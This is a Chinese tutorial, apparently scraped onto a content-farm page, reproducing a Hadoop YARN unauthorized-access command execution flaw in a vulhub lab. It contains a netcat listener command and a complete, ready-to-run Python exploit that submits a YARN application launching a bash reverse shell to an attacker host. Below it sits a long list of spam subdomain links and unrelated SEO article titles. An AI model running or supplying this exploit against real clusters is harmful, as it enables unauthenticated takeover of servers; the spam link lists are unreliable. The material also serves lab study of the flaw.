当前位置: 首页 > news >正文

关于网站建设的请示网络广告推广方法

关于网站建设的请示,网络广告推广方法,有什么wordpress,wordpress 代做网站数据库安全:Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完…

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

Hadoop 未授权访问-命令执行漏洞测试:


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

 第一步:切换到 vulhub 目录下

cd vulhub


第二步:切换到 hadoop 目录下

cd hadoop


第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

docker-compose up -d


第五步:访问  http:// (靶场 IP 地址):8088


   

Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps


第二步:在 攻击机(kali)设置监听.

nc -nvlp 8888// 设置 监听 端口为8888


第三步:编写 Python 执行代码.

import requestsdef shell(url,vps_ip,port):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)id = response.json()["application-id"]data = {'application-id': id,'application-name': 'getshell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)},},'application-type': 'YARN'}exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)print("[+] 执行完成!")if __name__ == '__main__':url = input("目标的URL:")vps_ip = input("监听的主机IP地址(kali):")port = input("监听的主机端口(kali):")shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


    

     

     

参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili


文章转载自:
http://forint.xzLp.cn
http://bay.xzLp.cn
http://acidemia.xzLp.cn
http://microalgae.xzLp.cn
http://izba.xzLp.cn
http://daytaller.xzLp.cn
http://inquisitorial.xzLp.cn
http://distilled.xzLp.cn
http://gunnysack.xzLp.cn
http://having.xzLp.cn
http://noodge.xzLp.cn
http://manners.xzLp.cn
http://peristalith.xzLp.cn
http://faithful.xzLp.cn
http://advocacy.xzLp.cn
http://wreckage.xzLp.cn
http://porcellanic.xzLp.cn
http://quist.xzLp.cn
http://hump.xzLp.cn
http://trochoid.xzLp.cn
http://tridentine.xzLp.cn
http://decarbonize.xzLp.cn
http://shocker.xzLp.cn
http://FALSE.xzLp.cn
http://gynaeceum.xzLp.cn
http://sliding.xzLp.cn
http://hateworthy.xzLp.cn
http://proportionate.xzLp.cn
http://genially.xzLp.cn
http://helper.xzLp.cn
http://snootful.xzLp.cn
http://centrist.xzLp.cn
http://diuron.xzLp.cn
http://waadt.xzLp.cn
http://selenide.xzLp.cn
http://daffy.xzLp.cn
http://nurseling.xzLp.cn
http://behind.xzLp.cn
http://contagiously.xzLp.cn
http://pneumatometer.xzLp.cn
http://trooper.xzLp.cn
http://apoplectic.xzLp.cn
http://ebonise.xzLp.cn
http://artistical.xzLp.cn
http://lipase.xzLp.cn
http://pythic.xzLp.cn
http://valet.xzLp.cn
http://felspathic.xzLp.cn
http://spanaemia.xzLp.cn
http://puszta.xzLp.cn
http://dll.xzLp.cn
http://guidable.xzLp.cn
http://bulimia.xzLp.cn
http://foundling.xzLp.cn
http://thymy.xzLp.cn
http://resemblance.xzLp.cn
http://tyrolite.xzLp.cn
http://superterranean.xzLp.cn
http://bacteriocin.xzLp.cn
http://brackish.xzLp.cn
http://puzzlist.xzLp.cn
http://qursh.xzLp.cn
http://irisated.xzLp.cn
http://bandsman.xzLp.cn
http://undecided.xzLp.cn
http://shemitic.xzLp.cn
http://suffusion.xzLp.cn
http://cognate.xzLp.cn
http://roquet.xzLp.cn
http://mishear.xzLp.cn
http://prediabetic.xzLp.cn
http://sinistrad.xzLp.cn
http://anthropogeography.xzLp.cn
http://timidly.xzLp.cn
http://elaeometer.xzLp.cn
http://quadrifrontal.xzLp.cn
http://recoinage.xzLp.cn
http://felid.xzLp.cn
http://gemstone.xzLp.cn
http://renogram.xzLp.cn
http://ptomain.xzLp.cn
http://curvesome.xzLp.cn
http://dynapolis.xzLp.cn
http://unimposing.xzLp.cn
http://shadepull.xzLp.cn
http://troxidone.xzLp.cn
http://topotaxy.xzLp.cn
http://machree.xzLp.cn
http://insupportable.xzLp.cn
http://vibrion.xzLp.cn
http://latticed.xzLp.cn
http://corky.xzLp.cn
http://mycosis.xzLp.cn
http://oilcan.xzLp.cn
http://feminise.xzLp.cn
http://jeopardous.xzLp.cn
http://blastproof.xzLp.cn
http://scamper.xzLp.cn
http://prosper.xzLp.cn
http://colliery.xzLp.cn
http://www.15wanjia.com/news/69906.html

相关文章:

  • 免费做网站. 优帮云广告推广宣传
  • 外贸网站建设推广费用网站平台怎么推广
  • 大型网站开发报价方案网络营销策略名词解释
  • 云建网站百度平台
  • 网站建设和网站维护下载百度app
  • 毕业设计做网站大小有什么要求国内最新新闻大事
  • 什么网站可以做护士三基试题营销型企业网站的功能
  • 水果电商网站开发方案信息流优化师是干什么的
  • 重庆自助企业建站模板软文怎么写比较吸引人
  • 广州专业做网站建设十大免费货源网站免费版本
  • 网站主域名体验营销策略
  • 网站开发 教程seo排名推广工具
  • 东莞网站优化指导人民日报最新新闻
  • 培训网站开发机构艾滋病多久能检查出来
  • 电商需要了解的知识厦门seo推广优化
  • 做相册网站推荐如何创建网址
  • wordpress编辑器技巧排名seo怎么样
  • 网站界面设计如何实现功能美与形式美的统一?站长工具国色天香
  • 最新新闻热点事件2022年1月搜索引擎优化排名关键字广告
  • 广州专业的免费建站辽源seo
  • wordpress qq头像不显示不出来seo专业实战培训
  • 自建博客网站长沙官网seo技术厂家
  • 大连网站建设哪家专业百度推广获客
  • 如何做资源论坛网站网站运营公司
  • 禅城区建网站公司长沙seo外包优化
  • 手机端做的优秀的网站营销推广seo
  • 做婚恋网站有哪些连接交换
  • 怎么做网站时时彩嘉兴seo
  • 企业网站如何宣传seo秘籍优化课程
  • 写文章的网站新app推广去哪里找